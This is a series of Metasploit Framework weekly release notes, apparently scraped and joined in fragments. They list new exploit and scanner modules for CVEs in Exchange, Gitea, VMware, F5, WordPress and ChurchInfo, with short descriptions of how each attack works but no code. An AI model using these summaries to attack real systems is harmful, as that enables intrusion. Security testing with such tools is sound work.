#17352 from smashery – A bug has been fixed in the file_version method for Windows Meterpreter, which would cause the session to crash if it was run on a file that did not exist on the target system.
#17361 from jmartin-r7 – A bug has been fixed that would cause a crash when running the exit command from within msfconsole when running msfconsole with a 3.1.x release of Ruby.
#17366 from zeroSteiner – The upload and download commands used by shell sessions have been updated to handle directory destinations in the same way as the Meterpreter equivalents do, and to fix some bugs when uploading and downloading files that would prevent errors from being displayed and might cause session crashes.
#17368 from adfoster-r7 – Fixes a regression issue with msfvenom payload generation for large payloads taking more than 5 minutes to generate when outputting as hex format. Now it takes a few seconds as normal.
#17370 from jmartin-r7 – A bug has been fixed in the smb_enumshares.rb whereby if a SMBv1 connection is used a call was made to the net_share_enum_all function on the wrong object. This has since been updated to address this error.
#17378 from gwillcox-r7 – A bug has been fixed in the Meterpreter payloads that was preventing Python Meterpreter from being able to utilize its EventLog API properly. Additionally a bug has been fixed in the COFFLoader that prevented BOFLoader from working with some COFF files.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Jan Rude added a new module that gives users the ability to brute-force login for Linux Syncovery. This expands Framework’s capability to scan logins to Syncovery, a popular web GUI for backups.
WordPress extension SQL injection module
Cydave, destr4ct, and jheysel-r7 contributed a new module that takes advantage of a vulnerable WordPress extension. This allows Framework users to take advantage of CVE-2022-0739, leveraging a UNION-based SQL injection to gather hashed passwords of WordPress users. For vulnerable versions, anyone who can access the BookingPress plugin page will also have access to all the credentials in the database, yikes! There are currently 3,000 active installs of the plugin, which isn’t a huge number by WordPress standards—but the ease of remote exploitation makes it a fun addition to the framework.
VMware vCenter "vScalation" Privilege Escalation by Yuval Lazar and h00die, which exploits CVE-2021-22015 – This PR adds a privilege escalation for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained.
Enhancements and features (2)
#17214 from h00die – This PR improves upon the data gathered on a vCenter server originally implemented in #16871, including library integration, optimization, and de-duplication.
#17332 from bcoles – Updates windows/gather/enum_proxy to support non-Meterpreter sessions (shell, PowerShell).
Bugs fixed (5)
#17183 from rbowes-r7 – This adds some small changes, cleanups, and fixes to the linux/http/zimbra_unrar_cve_2022_30333 and linux/http/zimbra_cpio_cve_2022_41352 Zimbra exploit modules, along with linux/local/zimbra_slapper_priv_esc documentation. Particularly, this fixes an issue that prevented the exploit modules from working properly when the handler was prematurely shut down.
#17305 from cgranleese-r7 – Updates Metasploit’s RPC to automatically choose an appropriate payload if module.execute is invoked without a payload set. This mimics the functionality of msfconsole.
#17323 from h00die – Fixes a bug when attempting to detect enlightenment_sys in exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.
#17330 from zeroSteiner – This fixes an issue in the ProxyShell module, which limited the email enumeration to 100 entries. Now, it correctly enumerates all the emails before finding one that is suitable for exploitation.
#17342 from gwillcox-r7 – This adds the necessary control to the search queries used to find vulnerable certificate templates in an AD CS environment. Prior to this, non-privileged users would not be able to read the security descriptor field.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
I ## ProxyNotShell
This week’s Metasploit release includes an exploit module for CVE-2022-41082, AKA ProxyNotShell by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, Orange Tsai, Piotr Bazydło, Rich Warren, Soroush Dalili, and our very own Spencer McIntyre. The vulnerability CVE-2022-41082, AKA ProxyNotShell is a deserialization flaw in Microsoft Exchange’s PSRP backend. Microsoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. For more information, see CVE-2022-41082 and CONTROL YOUR TYPES OR GET PWNED. The ProxyNotShell exploit also added new Exchange SSRF functionality that allows both it and the previous ProxyShell module to target Exchange server instances which utilize a Data Access Group (DAG) backend. The Metasploit team has yet to see another public Proof of Concept that takes this configuration type into account.
Remote Control Collection RCE
Community contributors h00die and H4rk3nz0 also introduced another exploit module in this week’s release. This module targets the remote control software which allows a remote person to connect and execute screen commands via mobile devices. Note that this module will only deploy a payload if the server is set without a password (default). A side note, if you’re looking to learn more about how you can use metasploit to hack target servers using remote code vulnerabilities, you might find this video (https://www.youtube.com/watch?v=eLbBR956Tgw) helpful.
New module content (2)
Microsoft Exchange ProxyNotShell RCE by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, Orange Tsai, Piotr Bazydło, Rich Warren, Soroush Dalili, and Spencer McIntyre, which exploits CVE-2022-41082 – This adds an exploit module for CVE-2022-41082, AKA ProxyNotShell. This vulnerability is a deserialization flaw in Microsoft Exchange’s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as GHSA-6ph7-8wxv-6gf2. Together, these vulnerabilities allow an authenticated attacker to execute arbitrary commands on a Microsoft Exchange Server.
Remote Control Collection RCE by H4rk3nz0 and h00die – This PR adds an exploit targeting the Remote Control Server software which allows remote control of a PC, now including running a payload.
Enhancements and features (1)
#17304 from om3rcitak – Improves auxiliary/scanner/http/tomcat_mgr_login.rb error message on 401 status codes to include the user defined URI.
Bugs fixed (2)
#17163 from jheysel-r7 – This fixes a bug in the check method where we left an artifact on disk.
#17299 from smashery – This fixes a bug in the polkit_dbus_auth_bypass module that prevented it from working with certain session types.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
These discoveries were made by our very own Ron Bowes, who developed an exploit module for authenticated RCE against F5 devices running in appliance mode to achieve a Meterpreter session as the root user.
Ron Bowes has also developed an F5 Metasploit module exploiting CVE-2022-41622, a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below – which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.
For more information, see Rapid7’s blog post which detail the vulnerabilities.
DuckyScript support
Community contributor h00die contributed an enhancement to msfvenom. This adds the ducky-script-psh format to msfvenom:
F5 BIG-IP iControl CSRF File Write SOAP API by Ron Bowes, which exploits CVE-2022-41622 – This module exploits a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.
ChurchInfo 1.2.13-1.3.0 Authenticated RCE by m4lwhere, which exploits CVE-2021-43258 – A new module has been added for CVE-2021-43258 which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the www-user user.
Enhancements and features (6)
#17145 from k0pak4 – This PR adds the ability to authenticate via hash and improves the error reporting when authentication fails.
#17279 from h00die – This adds the ducky-script-psh format to msfvenom so it can create payloads that are compatible with Bad USB devices such as the Flipper Zero.
#17283 from bcoles – Improves the linux/gather/enum_psk module, and adds documentation
#17284 from bcoles – Updates modules/post/linux/gather/enum_network and modules/post/linux/gather/tor_hiddenservices to extract hostname details in a similar fashion to other modules
#17285 from bcoles – Improves validation in linux/gather/tor_hiddenservices to ensure that the locate command is present before running the module
#17296 from jmartin-r7 – Adds clarification to the module documentation that links to external resources are not controlled by project maintainers. These external resources may no longer exist and are subject to malicious takeover in the future. These links should be reviewed accordingly.
Bugs fixed (1)
#17277 from adfoster-r7 – Fixes a crash within the python reverse http stager.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream (CVE-2021-39144)
There’s nothing quite like a pre-authenticated remote code execution vulnerability in a piece of enterprise software. This week, community contributor h00die-gr3y added a module that targets VMware NSX Manager using XStream. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance. VMware saw this vulnerability as such a risk, and they decided to release patches for versions that were no longer supported, which goes to show the value that this module provides.
Using Gitea in your environment? You better git-to-patching. Community contributor krastanoel wrote an awesome module which exploits a remote code execution vulnerability in versions of Gitea before 1.16.7. The vulnerability identified as CVE-2022-30781 is due to the application running a git fetch command in which an attacker can inject arbitrary commands resulting in code execution as the git user.
Metasploit on Twitch
This week Metasploit’s very own Spencer McIntyre went live on Twitch and went over writing Meterpreter features in Metasploit. Be sure to check out the recording and stay tuned for more fun and informative Metasploit streaming sessions.
New module content (2)
VMware NSX Manager XStream unauthenticated RCE by Sina Kheirkhah, Steven Seeley, and h00die-gr3y, which exploits CVE-2021-39144 – This adds an exploit module that leverages a Remote Command Injection vulnerability in VMware Cloud Foundation 3.x and NSX Manager Data Center for vSphere up to and including version 6.4.13. This vulnerability is identified as CVE-2021-39144.
Gitea Git Fetch Remote Code Execution by krastanoel, li4n0, and wuhan005, which exploits CVE-2022-30781 – This adds an exploit module that leverages a command injection vulnerability in Gitea. Due to an improper escaping of input, it is possible to execute commands on the system abusing the Gitea repository migration process. This vulnerability is identified as CVE-2022-30781 and affects Gitea versions prior to 1.16.7.
Enhancements and features (2)
#17243 from adfoster-r7 – Improves the TLV packet logging for Railgun
#17253 from h00die – The list of WordPress plugins and themes has been updated to allow Metasploit tools to scan for a wider range of known themes and plugins on WordPress targets.
Bugs fixed (2)
#17260 from zeroSteiner – This fixes an issue with the RBCD module due to the access_mask field of the Access Control Entry types being changed from the AccessMask type to an integer.
#17263 from zeroSteiner – The Metasploit-payloads gem has been bumped to 2.0.101, which fixes memory and handle leaks when using the incognito plugin’s list_token functionality. It also updates the Mimikatz code in Metasploit to pull in the latest changes.
#17261 from zeroSteiner – This fixes support for port forwarding on Ruby 3 with meterpreter payloads.
#17264 from gwillcox-r7 – This bumps the Go version from 1.11.2 to 1.19.3 in the metasploit-framework Dockerfile.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Our very own Grant Willcox has developed a new module which allows users to query a LDAP server for vulnerable Active Directory Certificate Services (AD CS) certificate templates. The module will print the detected certificate details, and the attack it is susceptible to. This module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.
Example module output showing an identified vulnerable certificate template:
Community member h00die has made improvements to a new Metasploit’s SSL scanner modules, and combined the functionality of two existing modules auxiliary/scanner/http/ssl.rbauxiliary/scanner/http/ssl_version.rb into one new module auxiliary/scanner/ssl/ssl_version.rb. This new module has added checks for Deprecated protocols, expired/not valid certs, low key strength, Null cipher suites, certificates signed with MD5, DROWN, RC4 ciphers, exportable ciphers, LOGJAM, and BEAST.
Reduced Python payload sizes
Community member llamasoft has recently contributed improvements to our Python payloads, with the first change being a modification to the Python Meterpreter stage to calculate the necessary data for AES encryption at runtime – which helped reduce the stage size by about 6,000 bytes. This week’s Metasploit release includes compression support using zlib. This change reduces the size of the Python Meterpreter from 95kb to 24kb.
New module content (4)
Misconfigured Certificate Template Finder by Grant Willcox – This adds a module that analyzes certificate templates to identify ones that are vulnerable to ESC1, ESC2 and ESC3. When a template is found to be vulnerable, the necessary information is printed for the user including the template name, the issuing CAs and the SIDs of the users that are able to issue them.
SSL/TLS Version Detection by todb, Chris John Riley, Veit Hailperin, et, and h00die, which detects CVE-2022-3358 – A new module modules/auxiliary/scanner/ssl/ssl_version.rb has been released which replaces the old SSL scanners and offers improved features such as SSL cipher suite checking, improvements to CA Issuers logic, support for expired certs and depreciated protocols, and better error handling.
Reverse Lookup IP Addresses by mubix and bcoles – Adds a new post/multi/recon/reverse_lookup module that reverse resolves an IP address or IP address range to hostnames. The old post/windows/gather/reverse_lookup and post/windows/recon/resolve_ip modules have been removed.
Windows Gather Navicat Passwords by HyperSine and Kali-Team – This adds a post module that retrieves and decrypts passwords saved by Navicat.
Enhancements and features (6)
#17211 from llamasoft – This compresses Python payloads using zlib to make them smaller.
#17219 from jheysel-r7 – Update Zabbix login_scanner to work with version 6.2.4.
#17223 from cgranleese-r7 – The reload_lib functionality has been updated so that its file change tracking logic better takes into account scenarios where files are modified. Previously if a breakpoint was inserted, removed, and then reload_lib -a was run, it would mistakenly use an old copy of the code.
#17234 from cgranleese-r7 – Add references to info -d command in the options and info command outputs. This command allows you to generate a HTML document which you can use to view the full documentation of a module in your browser.
#17235 from jmartin-r7 – Updates auxiliary/scanner/http/manageengine_desktop_central_login module to report the service name correctly as http or https.
#17177 from nzdjb – A bug has been fixed when searching for or attempting to use modules whereby trailing :‘s were not handled appropriately as part of the input, and could lead to all modules in Metasploit being returned.
#17221 from adfoster-r7 -A bug has been fixed that would cause crashes when generating payload sizes. Additionally, the code has been updated to ignore payload metadata for adaptor payloads when determining payload sizes.
#17244 from zeroSteiner – A bug that could cause the hostname command to fail in Mettle versions of Meterpreter has been improved by adding increased validation to the hostname code.
#17220 from adfoster-r7 – This fixes a crash in the peinject stage that would occur when the PE datastore option was not set.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
The collective thoughts of the interwebz
By continuing to use the site, you agree to the use of cookies. more information
The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.
